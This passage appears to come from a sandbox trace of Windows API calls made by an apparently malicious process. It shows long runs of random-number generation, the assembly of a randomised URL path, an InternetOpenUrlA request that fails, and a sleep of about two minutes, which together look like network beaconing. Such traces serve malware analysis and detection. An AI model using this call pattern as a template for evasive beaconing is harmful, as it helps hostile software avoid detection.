hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0225.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1682e, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a1682e) returned 0x0 [0225.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0225.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0225.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16848, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a16848) returned 0x0 [0225.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0225.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0225.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.458] GetProcessHeap () returned 0x440000 [0225.458] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0225.458] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0225.458] lstrcatA (in: lpString1="\x04", lpString2="/uuw4qbiUq6K493bjs4jj1cy4anpuYikTZdrn408hhqlw/yt2mfha29wfGc0x91BlpmsBet/1YR3yfXzW2iHbw0o1qmty4cG7d9e2vOsnrqWJp4/" | out: lpString1="\x04/uuw4qbiUq6K493bjs4jj1cy4anpuYikTZdrn408hhqlw/yt2mfha29wfGc0x91BlpmsBet/1YR3yfXzW2iHbw0o1qmty4cG7d9e2vOsnrqWJp4/") returned="\x04/uuw4qbiUq6K493bjs4jj1cy4anpuYikTZdrn408hhqlw/yt2mfha29wfGc0x91BlpmsBet/1YR3yfXzW2iHbw0o1qmty4cG7d9e2vOsnrqWJp4/" [0225.458] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0225.458] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/uuw4qbiUq6K493bjs4jj1cy4anpuYikTZdrn408hhqlw/yt2mfha29wfGc0x91BlpmsBet/1YR3yfXzW2iHbw0o1qmty4cG7d9e2vOsnrqWJp4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0225.459] GetProcessHeap () returned 0x440000 [0225.459] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0225.459] GetProcessHeap () returned 0x440000 [0225.459] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0225.460] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0225.460] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0225.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0225.461] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0225.461] Sleep (dwMilliseconds=0x1c160) [0226.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0226.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.097] GetProcessHeap () returned 0x440000 [0226.097] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0226.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0226.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.481] BCryptGenRandom 